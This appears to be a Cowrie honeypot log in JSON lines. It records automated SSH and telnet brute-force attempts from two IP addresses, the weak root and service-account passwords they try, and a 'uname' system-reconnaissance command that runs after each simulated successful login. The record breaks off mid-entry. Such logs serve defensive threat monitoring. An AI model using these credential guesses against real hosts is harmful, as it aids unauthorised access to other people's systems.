{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:45.701589Z","src_ip":"212.227.235.229","session":"bc1112856ca2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:14:46.902510Z","src_ip":"212.227.235.229","session":"bc1112856ca2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:48.171394Z","src_ip":"212.227.235.229","session":"bc1112856ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56440,"dst_ip":"1.2.3.4","dst_port":23,"session":"675e100aad88","protocol":"telnet","message":"New connection: 212.227.125.160:56440 (1.2.3.4:23) [session: 675e100aad88]","sensor":"my-vps","timestamp":"2025-08-28T07:14:50.136127Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43768,"dst_ip":"1.2.3.4","dst_port":22,"session":"f34fac0d95ff","protocol":"ssh","message":"New connection: 212.227.125.160:43768 (1.2.3.4:22) [session: f34fac0d95ff]","sensor":"my-vps","timestamp":"2025-08-28T07:14:55.329097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:55.329894Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:55.548676Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:14:56.200210Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:14:56.712143Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:14:56.712859Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:56.931786Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:56.933053Z","src_ip":"212.227.125.160","session":"f34fac0d95ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40824,"dst_ip":"1.2.3.4","dst_port":22,"session":"17af8ae34bd3","protocol":"ssh","message":"New connection: 212.227.235.229:40824 (1.2.3.4:22) [session: 17af8ae34bd3]","sensor":"my-vps","timestamp":"2025-08-28T07:15:01.849992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:01.851012Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:02.099672Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:15:02.970220Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:15:03.483311Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:15:03.483988Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:03.733079Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:03.734276Z","src_ip":"212.227.235.229","session":"17af8ae34bd3"}
{"eventid":"cowrie.session.closed","duration":20.052510261535645,"message":"Connection lost after 20 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:10.188570Z","src_ip":"212.227.125.160","session":"675e100aad88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49864,"dst_ip":"1.2.3.4","dst_port":22,"session":"337a6f9113f7","protocol":"ssh","message":"New connection: 212.227.125.160:49864 (1.2.3.4:22) [session: 337a6f9113f7]","sensor":"my-vps","timestamp":"2025-08-28T07:15:11.655806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:11.656567Z","src_ip":"212.227.125.160","session":"337a6f9113f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:11.874989Z","src_ip":"212.227.125.160","session":"337a6f9113f7"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T07:15:12.532660Z","src_ip":"212.227.125.160","session":"337a6f9113f7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:13.753122Z","src_ip":"212.227.125.160","session":"337a6f9113f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42540,"dst_ip":"1.2.3.4","dst_port":22,"session":"c82cdb688757","protocol":"ssh","message":"New connection: 212.227.235.229:42540 (1.2.3.4:22) [session: c82cdb688757]","sensor":"my-vps","timestamp":"2025-08-28T07:15:18.116536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:18.118103Z","src_ip":"212.227.235.229","session":"c82cdb688757"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:18.378143Z","src_ip":"212.227.235.229","session":"c82cdb688757"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T07:15:19.159254Z","src_ip":"212.227.235.229","session":"c82cdb688757"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:20.420851Z","src_ip":"212.227.235.229","session":"c82cdb688757"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44992,"dst_ip":"1.2.3.4","dst_port":22,"session":"4069a4c31543","protocol":"ssh","message":"New connection: 212.227.125.160:44992 (1.2.3.4:22) [session: 4069a4c31543]","sensor":"my-vps","timestamp":"2025-08-28T07:15:27.903026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:27.903936Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:28.139168Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:15:29.114507Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:15:29.666832Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:15:29.667618Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:29.900640Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:29.901785Z","src_ip":"212.227.125.160","session":"4069a4c31543"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55694,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ec527b49a19","protocol":"ssh","message":"New connection: 212.227.235.229:55694 (1.2.3.4:22) [session: 5ec527b49a19]","sensor":"my-vps","timestamp":"2025-08-28T07:15:34.391101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:34.391879Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:34.645658Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:15:35.664156Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:15:36.259711Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:15:36.260446Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:36.516594Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:36.517789Z","src_ip":"212.227.235.229","session":"5ec527b49a19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58276,"dst_ip":"1.2.3.4","dst_port":22,"session":"459afe95f313","protocol":"ssh","message":"New connection: 212.227.125.160:58276 (1.2.3.4:22) [session: 459afe95f313]","sensor":"my-vps","timestamp":"2025-08-28T07:15:44.350967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:44.351897Z","src_ip":"212.227.125.160","session":"459afe95f313"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:44.575069Z","src_ip":"212.227.125.160","session":"459afe95f313"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:15:45.246816Z","src_ip":"212.227.125.160","session":"459afe95f313"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:46.471807Z","src_ip":"212.227.125.160","session":"459afe95f313"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58718,"dst_ip":"1.2.3.4","dst_port":22,"session":"56f3e64033d7","protocol":"ssh","message":"New connection: 212.227.235.229:58718 (1.2.3.4:22) [session: 56f3e64033d7]","sensor":"my-vps","timestamp":"2025-08-28T07:15:50.941085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:15:50.942119Z","src_ip":"212.227.235.229","session":"56f3e64033d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","s